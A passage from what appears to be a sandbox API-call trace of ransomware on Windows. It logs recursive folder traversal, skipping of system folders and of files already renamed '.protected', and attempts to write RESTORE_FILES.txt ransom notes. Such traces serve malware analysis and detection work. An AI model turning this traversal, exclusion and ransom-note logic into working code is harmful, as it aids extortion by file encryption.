(lpString1="..", lpString2="..") returned 0 [0093.170] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.170] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.170] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.170] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.170] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.170] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.170] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\RESTORE_FILES.txt") returned 63 [0093.170] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.170] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.170] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.170] lstrcmpiW (lpString1="Views", lpString2="Windows") returned -1 [0093.170] lstrcmpiW (lpString1="Views", lpString2="Program Files") returned 1 [0093.170] lstrcmpiW (lpString1="Views", lpString2="Program Files (x86)") returned 1 [0093.170] lstrcmpiW (lpString1="Views", lpString2="$Recycle.bin") returned 1 [0093.170] lstrcmpiW (lpString1="Views", lpString2="System Volume Information") returned 1 [0093.170] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views") returned 51 [0093.170] lstrcmpW (lpString1="Views", lpString2=".") returned 1 [0093.170] lstrcmpW (lpString1="Views", lpString2="..") returned 1 [0093.171] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\*") returned 53 [0093.171] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.171] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.171] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.171] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.171] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.171] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.171] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\.") returned 53 [0093.171] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.171] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.171] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.171] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.172] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.172] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.172] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.172] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\..") returned 54 [0093.172] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.172] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.172] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="Windows") returned -1 [0093.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="Program Files") returned -1 [0093.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="Program Files (x86)") returned -1 [0093.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="$Recycle.bin") returned 1 [0093.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="System Volume Information") returned -1 [0093.172] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned 76 [0093.172] lstrcmpW (lpString1="ApplicationViewsRootNode", lpString2=".") returned 1 [0093.172] lstrcmpW (lpString1="ApplicationViewsRootNode", lpString2="..") returned 1 [0093.172] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*") returned 78 [0093.172] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.172] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.172] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.172] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.172] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.172] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.172] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\.") returned 78 [0093.172] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.173] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.173] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.173] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.173] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.173] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.173] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.173] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\..") returned 79 [0093.173] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.173] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.173] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.173] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\RESTORE_FILES.txt") returned 94 [0093.173] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.173] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.173] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.173] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.173] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\RESTORE_FILES.txt") returned 94 [0093.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\views\\applicationviewsrootnode\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.173] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.174] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\RESTORE_FILES.txt") returned 69 [0093.174] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.174] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.174] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.174] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.174] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\RESTORE_FILES.txt") returned 69 [0093.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\views\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.175] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.175] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.175] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\RESTORE_FILES.txt") returned 63 [0093.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.176] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.176] lstrcmpiW (lpString1="IdentityCRL", lpString2="Windows") returned -1 [0093.176] lstrcmpiW (lpString1="IdentityCRL", lpString2="Program Files") returned -1 [0093.176] lstrcmpiW (lpString1="IdentityCRL", lpString2="Program Files (x86)") returned -1 [0093.176] lstrcmpiW (lpString1="IdentityCRL", lpString2="$Recycle.bin") returned 1 [0093.176] lstrcmpiW (lpString1="IdentityCRL", lpString2="System Volume Information") returned -1 [0093.176] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned 44 [0093.176] lstrcmpW (lpString1="IdentityCRL", lpString2=".") returned 1 [0093.176] lstrcmpW (lpString1="IdentityCRL", lpString2="..") returned 1 [0093.177] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*") returned 46 [0093.177] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.177] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.177] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.177] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.177] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.177] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.177] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\.") returned 46 [0093.177] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.177] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.177] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.177] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.177] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.177] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.177] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.177] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\..") returned 47 [0093.177] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.177] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.177] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.177] lstrcmpiW (lpString1="ppcrlconfig.dll.protected", lpString2="Windows") returned -1 [0093.177] lstrcmpiW (lpString1="ppcrlconfig.dll.protected", lpString2="Program Files") returned -1 [0093.177] lstrcmpiW (lpString1="ppcrlconfig.dll.protected", lpString2="Program Files (x86)") returned -1 [0093.177] lstrcmpiW (lpString1="ppcrlconfig.dll.protected", lpString2="$Recycle.bin") returned 1 [0093.177] lstrcmpiW (lpString1="ppcrlconfig.dll.protected", lpString2="System Volume Information") returned -1 [0093.177] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.protected") returned 70 [0093.177] StrStrIW (lpFirst="ppcrlconfig.dll.protected", lpSrch=".protected") returned=".protected" [0093.177] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.177] lstrcmpiW (lpString1="ppcrlui.dll.protected", lpString2="Windows") returned -1 [0093.177] lstrcmpiW (lpString1="ppcrlui.dll.protected", lpString2="Program Files") returned -1 [0093.178] lstrcmpiW (lpString1="ppcrlui.dll.protected", lpString2="Program Files (x86)") returned -1 [0093.178] lstrcmpiW (lpString1="ppcrlui.dll.protected", lpString2="$Recycle.bin") returned 1 [0093.178] lstrcmpiW (lpString1="ppcrlui.dll.protected", lpString2="System Volume Information") returned -1 [0093.178] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll.protected") returned 66 [0093.178] StrStrIW (lpFirst="ppcrlui.dll.protected", lpSrch=".protected") returned=".protected" [0093.178] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.178] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.178] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.178] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.178] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.178] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.178] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\RESTORE_FILES.txt") returned 62 [0093.178] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.178] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.178] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.178] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.178] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\RESTORE_FILES.txt") returned 62 [0093.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.178] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.178] lstrcmpiW (lpString1="Media Player", lpString2="Windows") returned -1 [0093.178] lstrcmpiW (lpString1="Media Player", lpString2="Program Files") returned -1 [0093.178] lstrcmpiW (lpString1="Media Player", lpString2="Program Files (x86)") returned -1 [0093.178] lstrcmpiW (lpString1="Media Player", lpString2="$Recycle.bin") returned 1 [0093.178] lstrcmpiW (lpString1="Media Player", lpString2="System Volume Information") returned -1 [0093.178] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player") returned 45 [0093.178] lstrcmpW (lpString1="Media Player", lpString2=".") returned 1 [0093.178] lstrcmpW (lpString1="Media Player", lpString2="..") returned 1 [0093.178] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\*") returned 47 [0093.178] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.179] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.179] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.179] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.179] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.179] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.179] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\.") returned 47 [0093.179] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.179] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.179] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.179] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.179] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.179] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.179] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.179] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\..") returned 48 [0093.179] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.179] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.179] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.179] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.179] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.179] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.179] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.179] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.179] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\RESTORE_FILES.txt") returned 63 [0093.179] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.179] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.179] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.179] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.179] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\RESTORE_FILES.txt") returned 63 [0093.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\media player\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.180] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.180] lstrcmpiW (lpString1="MF", lpString2="Windows") returned -1 [0093.180] lstrcmpiW (lpString1="MF", lpString2="Program Files") returned -1 [0093.180] lstrcmpiW (lpString1="MF", lpString2="Program Files (x86)") returned -1 [0093.180] lstrcmpiW (lpString1="MF", lpString2="$Recycle.bin") returned 1 [0093.180] lstrcmpiW (lpString1="MF", lpString2="System Volume Information") returned -1 [0093.180] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF") returned 35 [0093.180] lstrcmpW (lpString1="MF", lpString2=".") returned 1 [0093.180] lstrcmpW (lpString1="MF", lpString2="..") returned 1 [0093.180] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*") returned 37 [0093.180] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.180] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.180] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.180] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.180] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.180] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.180] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\.") returned 37 [0093.180] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.180] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.180] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.180] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.180] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.180] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.180] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.180] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\..") returned 38 [0093.181] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.181] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.181] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.181] lstrcmpiW (lpString1="Active.GRL.protected", lpString2="Windows") returned -1 [0093.181] lstrcmpiW (lpString1="Active.GRL.protected", lpString2="Program Files") returned -1 [0093.181] lstrcmpiW (lpString1="Active.GRL.protected", lpString2="Program Files (x86)") returned -1 [0093.181] lstrcmpiW (lpString1="Active.GRL.protected", lpString2="$Recycle.bin") returned 1 [0093.181] lstrcmpiW (lpString1="Active.GRL.protected", lpString2="System Volume Information") returned -1 [0093.181] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL.protected") returned 56 [0093.181] StrStrIW (lpFirst="Active.GRL.protected", lpSrch=".protected") returned=".protected" [0093.181] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.181] lstrcmpiW (lpString1="Pending.GRL.protected", lpString2="Windows") returned -1 [0093.181] lstrcmpiW (lpString1="Pending.GRL.protected", lpString2="Program Files") returned -1 [0093.181] lstrcmpiW (lpString1="Pending.GRL.protected", lpString2="Program Files (x86)") returned -1 [0093.181] lstrcmpiW (lpString1="Pending.GRL.protected", lpString2="$Recycle.bin") returned 1 [0093.181] lstrcmpiW (lpString1="Pending.GRL.protected", lpString2="System Volume Information") returned -1 [0093.181] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL.protected") returned 57 [0093.181] StrStrIW (lpFirst="Pending.GRL.protected", lpSrch=".protected") returned=".protected" [0093.181] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.181] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.181] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.181] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.181] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.181] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.181] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\RESTORE_FILES.txt") returned 53 [0093.181] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.181] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.181] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.181] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.181] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\RESTORE_FILES.txt") returned 53 [0093.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\mf\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.181] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.181] lstrcmpiW (lpString1="MSDN", lpString2="Windows") returned -1 [0093.181] lstrcmpiW (lpString1="MSDN", lpString2="Program Files") returned -1 [0093.181] lstrcmpiW 